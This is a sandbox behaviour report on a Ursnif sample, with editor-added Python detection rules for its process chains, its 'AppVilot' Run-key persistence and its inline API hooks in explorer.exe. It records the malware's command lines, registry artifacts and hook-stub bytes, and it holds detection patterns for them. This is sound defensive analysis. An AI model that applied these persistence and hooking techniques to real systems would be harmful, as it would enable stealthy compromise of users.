            Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5216:120:WilError_01
            Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:240:120:WilError_01
            Source: C:\Windows\System32\control.exe | Mutant created: \Sessions\1\BaseNamedObjects\{47C6B356-FA4E-1192-3C6B-CED530CFE2D9}
            Source: C:\Windows\System32\rundll32.exe | Mutant created: \Sessions\1\BaseNamedObjects\{F3013777-B6DE-9DC6-58D7-4A210CFB1EE5}
            Source: C:\Windows\System32\control.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\{9344C259-D600-3D42-7877-6AC12C9B3E85}
            Source: C:\Windows\explorer.exe | File created: C:\Users\user\AppData\Local\Temp\2880.bin
            Source: 4.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            Source: C:\Windows\System32\control.exe | File read: C:\Users\user\Desktop\desktop.ini
            Source: C:\Users\user\Desktop\4.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: C:\Windows\System32\nslookup.exe | File read: C:\Windows\System32\drivers\etc\hosts
            Source: C:\Windows\System32\nslookup.exe | File read: C:\Windows\System32\drivers\etc\hosts
            Source: C:\Windows\System32\nslookup.exe | File read: C:\Windows\System32\drivers\etc\hosts
            Source: C:\Windows\System32\nslookup.exe | File read: C:\Windows\System32\drivers\etc\hosts
            Source: unknown | Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL /?
            Source: 4.exe | Virustotal: Detection: 78%
            Source: 4.exe | ReversingLabs: Detection: 79%
            Source: unknown | Process created: C:\Users\user\Desktop\4.exe 'C:\Users\user\Desktop\4.exe'
            Source: unknown | Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe /?
            Source: unknown | Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL /?
            Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /C 'nslookup myip.opendns.com resolver1.opendns.com > C:\Users\user\AppData\Local\Temp\A73F.bi1'
            Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /C 'nslookup myip.opendns.com resolver1.opendns.com > C:\Users\user\AppData\Local\Temp\A83F.bi1'
            Source: unknown | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: unknown | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: unknown | Process created: C:\Windows\System32\nslookup.exe nslookup myip.opendns.com resolver1.opendns.com
            Source: unknown | Process created: C:\Windows\System32\nslookup.exe nslookup myip.opendns.com resolver1.opendns.com
            Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /C 'echo -------- >> C:\Users\user\AppData\Local\Temp\A73F.bi1'
            Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /C 'echo -------- >> C:\Users\user\AppData\Local\Temp\A83F.bi1'
            Source: unknown | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: unknown | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: unknown | Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\syswow64\cmd.exe' /C pause dll mail, ,
            Source: unknown | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\4.exe | Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe /?
            Source: C:\Windows\System32\control.exe | Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL /?
            Source: C:\Windows\explorer.exe | Process created: C:\Windows\System32\cmd.exe cmd /C 'nslookup myip.opendns.com resolver1.opendns.com > C:\Users\user\AppData\Local\Temp\A73F.bi1'
            Source: C:\Windows\explorer.exe | Process created: C:\Windows\System32\cmd.exe cmd /C 'nslookup myip.opendns.com resolver1.opendns.com > C:\Users\user\AppData\Local\Temp\A83F.bi1'
            Source: C:\Windows\explorer.exe | Process created: C:\Windows\System32\cmd.exe cmd /C 'echo -------- >> C:\Users\user\AppData\Local\Temp\A73F.bi1'
            Source: C:\Windows\explorer.exe | Process created: C:\Windows\System32\cmd.exe cmd /C 'echo -------- >> C:\Users\user\AppData\Local\Temp\A83F.bi1'
            Source: C:\Windows\explorer.exe | Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\syswow64\cmd.exe' /C pause dll mail, ,
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\nslookup.exe nslookup myip.opendns.com resolver1.opendns.com Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\nslookup.exe nslookup myip.opendns.com resolver1.opendns.com Jump to behavior
            Source: C:\Windows\System32\control.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
            Source: C:\Windows\explorer.exeFile opened: C:\Windows\SYSTEM32\msftedit.dllJump to behavior
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Windows\explorer.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
            Source: Binary string: wscui.pdbUGP source: explorer.exe, 0000000F.00000000.372476514.0000000006FE0000.00000002.00000001.sdmp
            Source: Binary string: ntdll.pdb source: 4.exe, 00000000.00000003.347072067.0000000002FF0000.00000004.00000001.sdmp
            Source: Binary string: wntdll.pdbUGP source: explorer.exe, 0000000F.00000003.431916268.0000000006C20000.00000004.00000001.sdmp
            Source: Binary string: ntdll.pdbUGP source: 4.exe, 00000000.00000003.347072067.0000000002FF0000.00000004.00000001.sdmp
            Source: Binary string: wntdll.pdb source: explorer.exe, 0000000F.00000003.431916268.0000000006C20000.00000004.00000001.sdmp
            Source: Binary string: wscui.pdb source: explorer.exe, 0000000F.00000000.372476514.0000000006FE0000.00000002.00000001.sdmp
            Source: C:\Users\user\Desktop\4.exeCode function: 0_2_020A5337 push ecx; ret 0_2_020A5347
            Source: C:\Users\user\Desktop\4.exeCode function: 0_2_020A52F0 push ecx; ret 0_2_020A52F9
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 37_2_02A1CC1B push ecx; mov dword ptr [esp], 00000002h37_2_02A1CC1C
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 37_2_02A2713B push ecx; ret 37_2_02A2714B
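The process chains above are the part of this report most useful for detection: the loader starts control.exe with "/?" from the user's Desktop, control.exe starts rundll32 Shell32.dll,Control_RunDLL "/?", and the injected explorer.exe later runs cmd /C nslookup myip.opendns.com resolver1.opendns.com redirected into %TEMP%\<4 hex digits>.bi1, followed by an "echo --------" append to the same file, plus a 32-bit cmd with the meaningless "pause dll mail, ," line. The rules below are an added example written by the editor, not tooling from the sandbox or from the malware analysis; they assume process-creation events with the Sysmon Event ID 1 fields ProcessId, ParentImage, Image and CommandLine. PIDs 1632 and 4540 come from the report; every other PID, the event records and the rule names are constructed. Note that an nslookup against OpenDNS on its own is also done by legitimate scripts; what makes this pattern specific is explorer.exe as the parent and the .bi1 file in Temp.

```python
"""Added example (not part of the sandbox report): triage rules for the process
chains recorded above, run over process-creation events.

Assumptions (constructed for this example): events carry the Sysmon Event ID 1
fields ProcessId, ParentImage, Image and CommandLine; PIDs other than 1632 and
4540 (which the report gives) are made up, and the rule names are the editor's."""
import re

# explorer.exe, once injected, asks OpenDNS for the host's public IP and
# redirects the answer into %TEMP%\<4 hex digits>.bi1.
IPCHECK_RE = re.compile(
    r"nslookup\s+myip\.opendns\.com\s+resolver1\.opendns\.com\s*>\s*"
    r"[^'\"]*\\Temp\\[0-9A-Fa-f]{4}\.bi1", re.IGNORECASE)
BI1_PATH_RE = re.compile(r"([A-Za-z]:\\[^'\"]*?\\[0-9A-Fa-f]{4}\.bi1)")
# control.exe /? -> rundll32 Shell32.dll,Control_RunDLL /? is the chain the
# loader starts from the user's Desktop and then injects into.
CONTROL_HELP_RE = re.compile(r"control\.exe\s+/\?\s*$", re.IGNORECASE)
RUNDLL_CONTROL_RE = re.compile(r"Shell32\.dll,Control_RunDLL\s+/\?", re.IGNORECASE)
# 32-bit cmd launched by explorer.exe with the nonsense "pause dll mail, ," line.
PAUSE_MAIL_RE = re.compile(r"cmd\.exe['\"]?\s+/C\s+pause\s+dll\s+mail", re.IGNORECASE)


def _name(path):
    return path.rsplit("\\", 1)[-1].lower()


def classify(ev):
    """Return the rule names that match one event."""
    parent, image = _name(ev.get("ParentImage", "")), _name(ev.get("Image", ""))
    cmd = ev.get("CommandLine", "")
    hits = []
    if image == "cmd.exe" and parent == "explorer.exe" and IPCHECK_RE.search(cmd):
        hits.append("ursnif_external_ip_check")
    if image == "cmd.exe" and parent == "explorer.exe" and PAUSE_MAIL_RE.search(cmd):
        hits.append("explorer_cmd_pause_dll_mail")
    # control.exe started with /? by something under \Users\ (here 4.exe on the Desktop)
    if image == "control.exe" and CONTROL_HELP_RE.search(cmd) \
            and "\\users\\" in ev.get("ParentImage", "").lower():
        hits.append("control_exe_help_from_user_path")
    if image == "rundll32.exe" and RUNDLL_CONTROL_RE.search(cmd):
        hits.append("rundll32_control_rundll_help")
    return hits


def scan(events):
    """(ProcessId, rule) for every matching event."""
    return [(ev["ProcessId"], rule) for ev in events for rule in classify(ev)]


def correlate_bi1(events):
    """Group the nslookup redirect and the 'echo --------' append by .bi1 file,
    so the two cmd launches show up as one stage-marked sequence."""
    stages = {}
    for ev in events:
        m = BI1_PATH_RE.search(ev.get("CommandLine", ""))
        if not m:
            continue
        stage = "nslookup" if "nslookup" in ev["CommandLine"] else "echo"
        stages.setdefault(m.group(1), set()).add(stage)
    return {path: sorted(s) for path, s in stages.items()}


# Constructed sample events modelled on the report's process tree.
SAMPLE_EVENTS = [
    {"ProcessId": 1632, "ParentImage": r"C:\Users\user\Desktop\4.exe",
     "Image": r"C:\Windows\System32\control.exe",
     "CommandLine": r"C:\Windows\system32\control.exe /?"},
    {"ProcessId": 4540, "ParentImage": r"C:\Windows\System32\control.exe",
     "Image": r"C:\Windows\System32\rundll32.exe",
     "CommandLine": r"'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL /?"},
    {"ProcessId": 5001, "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"cmd /C 'nslookup myip.opendns.com resolver1.opendns.com > C:\Users\user\AppData\Local\Temp\A73F.bi1'"},
    {"ProcessId": 5002, "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"cmd /C 'echo -------- >> C:\Users\user\AppData\Local\Temp\A73F.bi1'"},
    {"ProcessId": 5003, "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\SysWOW64\cmd.exe",
     "CommandLine": r"'C:\Windows\syswow64\cmd.exe' /C pause dll mail, ,"},
    # benign control: an admin typing the same nslookup into a console
    {"ProcessId": 5100, "ParentImage": r"C:\Windows\System32\cmd.exe",
     "Image": r"C:\Windows\System32\nslookup.exe",
     "CommandLine": r"nslookup myip.opendns.com resolver1.opendns.com"},
]

if __name__ == "__main__":
    for pid, rule in scan(SAMPLE_EVENTS):
        print(f"PID {pid}: {rule}")
    print(correlate_bi1(SAMPLE_EVENTS))
```

The correlation step is what turns two unremarkable cmd launches into one finding: the same .bi1 path carries both the nslookup redirect and the echo append, and the second launch would not match anything on its own.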

Boot Survival:

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Source: C:\Users\user\Desktop\4.exe | Window found: window name: ProgMan

Source: C:\Windows\explorer.exe | Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run AppVilot (2 occurrences)
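Two registry artifacts in this report survive a reboot and are worth checking on other hosts: the Run value named AppVilot written by the injected explorer.exe, and the HKCU\Software\AppDataLow\Software\Microsoft\6733C9B4-9A99-311C-DC8B-6EF5D0EF82F9 key whose Client32 value the sample writes (listed further down under hooking). The checker below is an added example by the editor, not the sandbox's tooling; it works offline on a `reg export HKCU` dump so it can be run over exports collected from many machines. The .reg text below is constructed (the AppVilot data is a placeholder; the report does not say what the value points to), and generalising from this sample's GUID to "any GUID-shaped subkey under AppDataLow\Software\Microsoft holding a Client32 or Client64 value" is the editor's assumption, not a statement from the report.

```python
"""Added example (not the report's own tooling): check a `reg export HKCU` dump
for the two registry artifacts the report records: the Run value "AppVilot" and
the AppDataLow\Software\Microsoft\<GUID> key carrying a Client32 value.

Assumptions: the input is the text reg.exe export writes (UTF-16 on disk); the
sample below is constructed, the AppVilot data is a placeholder, and matching
any GUID-shaped subkey with Client32/Client64 is an editor generalisation."""
import re

RUN_KEY = r"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run"
APPDATALOW = r"HKEY_CURRENT_USER\Software\AppDataLow\Software\Microsoft"
GUID_RE = re.compile(r"^[0-9A-F]{8}(-[0-9A-F]{4}){3}-[0-9A-F]{12}$", re.IGNORECASE)


def parse_reg(text):
    """Return {key: {value_name: raw_data}} from .reg text.
    Handles the backslash line continuations reg.exe uses for long hex data."""
    keys = {}
    current = None
    pending = ""
    for raw in text.splitlines():
        line = pending + raw.strip()
        pending = ""
        if not line or line.startswith("Windows Registry Editor"):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            keys[current] = {}
            continue
        if line.endswith("\\"):            # value data continues on the next line
            pending = line[:-1]
            continue
        if current is not None and "=" in line:
            name, _, data = line.partition("=")
            name = "@" if name == "@" else name.strip('"')
            keys[current][name] = data
    return keys


def find_ursnif_artifacts(keys):
    """Return (kind, key, value_name, data_excerpt) tuples for the two artifacts."""
    findings = []
    for key, values in keys.items():
        head, _, leaf = key.rpartition("\\")
        if key.lower() == RUN_KEY.lower():
            for name, data in values.items():
                if name.lower() == "appvilot":
                    findings.append(("run_value_appvilot", key, name, data))
        elif head.lower() == APPDATALOW.lower() and GUID_RE.match(leaf):
            for name, data in values.items():
                if name.lower() in ("client32", "client64"):
                    findings.append(("appdatalow_guid_client_blob", key, name, data[:24] + "..."))
    return findings


# Constructed .reg excerpt: one benign Run value, the AppVilot value with
# placeholder data, the GUID key from the report with placeholder Client32 bytes,
# and a non-GUID sibling key that must not match.
SAMPLE_REG = r'''Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"OneDrive"="\"C:\\Users\\user\\AppData\\Local\\Microsoft\\OneDrive\\OneDrive.exe\" /background"
"AppVilot"="C:\\Users\\user\\AppData\\Roaming\\placeholder.exe"

[HKEY_CURRENT_USER\Software\AppDataLow\Software\Microsoft\6733C9B4-9A99-311C-DC8B-6EF5D0EF82F9]
"Client32"=hex:de,ad,be,ef,00,11,22,33,44,55,66,77,88,99,aa,bb,\
  cc,dd,ee,ff

[HKEY_CURRENT_USER\Software\AppDataLow\Software\Microsoft\Internet Explorer]
"Placeholder"="value"
'''

if __name__ == "__main__":
    for finding in find_ursnif_artifacts(parse_reg(SAMPLE_REG)):
        print(*finding, sep=" | ")
```

On a live host, collect the dump with `reg export HKCU hkcu.reg` and feed it in with `parse_reg(open("hkcu.reg", encoding="utf-16").read())`; reg.exe writes the file as UTF-16 with a byte-order mark, which that codec consumes.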

Hooking and other Techniques for Hiding and Protection:

Yara detected Ursnif
Source: Yara match | File source: 0000000F.00000002.529092994.0000000003B8E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000025.00000002.437630054.0000000002A2D000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000D.00000002.392030682.00000000005DE000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000012.00000002.392099343.00000232E0E6E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000025.00000003.435889269.0000000002650000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000D.00000003.347648132.000001ED61700000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000020.00000002.526191335.0000020E08F3E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000012.00000003.390938718.00000232E0DD0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000018.00000002.526900525.000001E76783E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000011.00000002.520597240.000002413CA4E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000001D.00000002.518229914.00000209AC23E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: explorer.exe PID: 3472, type: MEMORY
Source: Yara match | File source: Process Memory Space: RuntimeBroker.exe PID: 4288, type: MEMORY
Source: Yara match | File source: Process Memory Space: control.exe PID: 1632, type: MEMORY
Source: Yara match | File source: Process Memory Space: RuntimeBroker.exe PID: 4448, type: MEMORY
Source: Yara match | File source: Process Memory Space: rundll32.exe PID: 4540, type: MEMORY
Source: Yara match | File source: Process Memory Space: RuntimeBroker.exe PID: 4016, type: MEMORY
Hooks registry keys query functions (used to hide registry keys)
Source: explorer.exe | IAT, EAT, inline or SSDT hook detected: function: api-ms-win-core-registry-l1-1-0.dll:RegGetValueW
Modifies the export address table of user mode modules (user mode EAT hooks)
Source: explorer.exe | EAT of a user mode module has changed: module: KERNEL32.DLL function: CreateProcessAsUserW address: 7FFA9B33521C
Modifies the import address table of user mode modules (user mode IAT hooks)
Source: explorer.exe | IAT of a user mode module has changed: module: WININET.dll function: api-ms-win-core-processthreads-l1-1-0.dll:CreateProcessW address: 7FFA9B335200
Modifies the prolog of user mode functions (user mode inline hooks)
Source: explorer.exe | User mode code has changed: module: KERNEL32.DLL function: CreateProcessAsUserW new code: 0xFF 0xF2 0x25 0x50 0x00 0x00
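The three hook findings above (EAT, IAT and a rewritten prolog, all steering process creation in explorer.exe so that new processes get injected too) are detected the same way a hook scanner does it: map a clean copy of the module at the same base as the one in the process and compare the first bytes of each export. The code below is an added example written by the editor, not the sandbox's scanner or the malware's code; it assumes the two byte images have already been obtained and relocated to a common base. BASE, the export RVAs, the clean prologs and the hook targets are constructed for the example and are not the bytes the report shows. It goes slightly beyond the report by also decoding the three stub forms commonly written over an x64 prolog (jmp rel32, jmp qword ptr [rip+disp32] with an adjacent 8-byte slot, and mov rax,imm64 / jmp rax).

```python
"""Added example (not from the report): find and decode user-mode inline hooks of
the kind listed above for explorer.exe, by comparing the first bytes of each
exported function in the mapped module against a clean copy of the module.

Assumptions: the caller already has both byte images at the same base (e.g. the
module read out of the process, and the file on disk mapped and relocated to
that base); BASE, the RVAs, prologs and hook targets below are constructed for
this example and are not the bytes the report records."""
import struct

BASE = 0x7FFA9B300000            # constructed load address of the module
HOOK_TARGET_A = 0x7FFA9B340000   # constructed: where the jmp rel32 stub lands
HOOK_TARGET_B = 0x7FF912345678   # constructed: address stored in the jmp [rip+0] slot
EXPORTS = {"CreateProcessAsUserW": 0x100, "CreateProcessW": 0x180, "GetTickCount": 0x1C0}
MASK64 = 0xFFFFFFFFFFFFFFFF


def build_images():
    """Return (disk_image, memory_image): identical except for two patched prologs."""
    disk = bytearray(0x200)
    disk[0x100:0x10A] = bytes.fromhex("48895C2408574883EC20")  # mov [rsp+8],rbx; push rdi; sub rsp,20h
    disk[0x180:0x186] = bytes.fromhex("40534883EC20")          # push rbx; sub rsp,20h
    disk[0x1C0:0x1C4] = bytes.fromhex("4883EC28")              # sub rsp,28h (left untouched)
    mem = bytearray(disk)
    # Hook 1: 5-byte relative jump written over CreateProcessAsUserW.
    rel = HOOK_TARGET_A - (BASE + 0x100 + 5)
    mem[0x100:0x105] = b"\xE9" + struct.pack("<i", rel)
    # Hook 2: FF 25 00000000 (jmp qword ptr [rip+0]) followed by the 8-byte target,
    # the usual stub when the handler is more than 2 GiB away.
    mem[0x180:0x186] = b"\xFF\x25" + struct.pack("<i", 0)
    mem[0x186:0x18E] = struct.pack("<Q", HOOK_TARGET_B)
    return bytes(disk), bytes(mem)


def decode_trampoline(code, addr, mem, base):
    """Classify the patched bytes at addr; returns (kind, resolved target or None)."""
    if len(code) >= 5 and code[0] == 0xE9:                       # jmp rel32
        rel = struct.unpack_from("<i", code, 1)[0]
        return "jmp_rel32", (addr + 5 + rel) & MASK64
    if len(code) >= 6 and code[:2] == b"\xFF\x25":               # jmp qword ptr [rip+disp32]
        disp = struct.unpack_from("<i", code, 2)[0]
        slot = (addr + 6 + disp) & MASK64
        off = slot - base
        if 0 <= off <= len(mem) - 8:                             # slot inside the image: read it
            return "jmp_rip_indirect", struct.unpack_from("<Q", mem, off)[0]
        return "jmp_rip_indirect", None                          # slot elsewhere: needs another read
    if len(code) >= 12 and code[:2] == b"\x48\xB8" and code[10:12] == b"\xFF\xE0":
        return "mov_rax_jmp_rax", struct.unpack_from("<Q", code, 2)[0]  # mov rax,imm64; jmp rax
    return "unknown_patch", None


def scan_hooks(disk, mem, exports, base, prolog_len=16):
    """Report every export whose first prolog_len bytes differ between the two images."""
    findings = []
    for name, rva in sorted(exports.items(), key=lambda kv: kv[1]):
        clean, live = disk[rva:rva + prolog_len], mem[rva:rva + prolog_len]
        if clean == live:
            continue
        changed = max(i for i in range(len(live)) if clean[i] != live[i]) + 1
        kind, target = decode_trampoline(live, base + rva, mem, base)
        findings.append({"function": name, "address": base + rva,
                         "new_code": live[:changed].hex(" "),
                         "kind": kind, "target": target})
    return findings


if __name__ == "__main__":
    disk_img, mem_img = build_images()
    for f in scan_hooks(disk_img, mem_img, EXPORTS, BASE):
        tgt = "?" if f["target"] is None else f"{f['target']:#x}"
        print(f"{f['function']:<22} {f['address']:#x} {f['kind']:<17} -> {tgt}  [{f['new_code']}]")
```

The comparison has to be done after relocation, otherwise every absolute address in the clean image differs and the scan drowns in false positives; and a hook whose jmp [rip] slot lives outside the module needs a second read from the process, which is why that case is returned without a target rather than guessed.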
Source: C:\Windows\explorer.exe | Registry key monitored for changes: HKEY_CURRENT_USER\Software\AppDataLow\Software\Microsoft\6733C9B4-9A99-311C-DC8B-6EF5D0EF82F9
Source: C:\Users\user\Desktop\4.exe | Key value created or modified: HKEY_CURRENT_USER\Software\AppDataLow\Software\Microsoft\6733C9B4-9A99-311C-DC8B-6EF5D0EF82F9 Client32
Source: C:\Windows\System32\control.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe | Process information set: NOOPENFILEERRORBOX (22 occurrences)
Source: C:\Windows\System32\rundll32.exe | Process information set: NOOPENFILEERRORBOX (4 occurrences)
Source: C:\Windows\System32\control.exe | File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: C:\Users\user\Desktop\4.exe TID: 6760 | Thread sleep count: 83 > 30
Source: C:\Users\user\Desktop\4.exe TID: 6756 | Thread sleep count: 47 > 30
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed (3 occurrences)
Source: C:\Users\user\Desktop\4.exe | Code function: 0_2_020A3B4B CreateFileA,GetFileTime,FindCloseChangeNotification,StrRChrA,lstrcat,FindFirstFileA,FindNextFileA,StrChrA,memcpy,FindNextFileA,CompareFileTime,FindClose,HeapFree,HeapFree, 0_2_020A3B4B
Source: C:\Windows\explorer.exe | Code function: 15_2_03B5B954 FindFirstFileW,DeleteFileW,FindNextFileW, 15_2_03B5B954
Source: C:\Windows\explorer.exe | Code function: 15_2_03B5A684 CreateFileA,FindCloseChangeNotification,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose, 15_2_03B5A684
Source: C:\Windows\explorer.exe | Code function: 15_2_03B53CAC FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose, 15_2_03B53CAC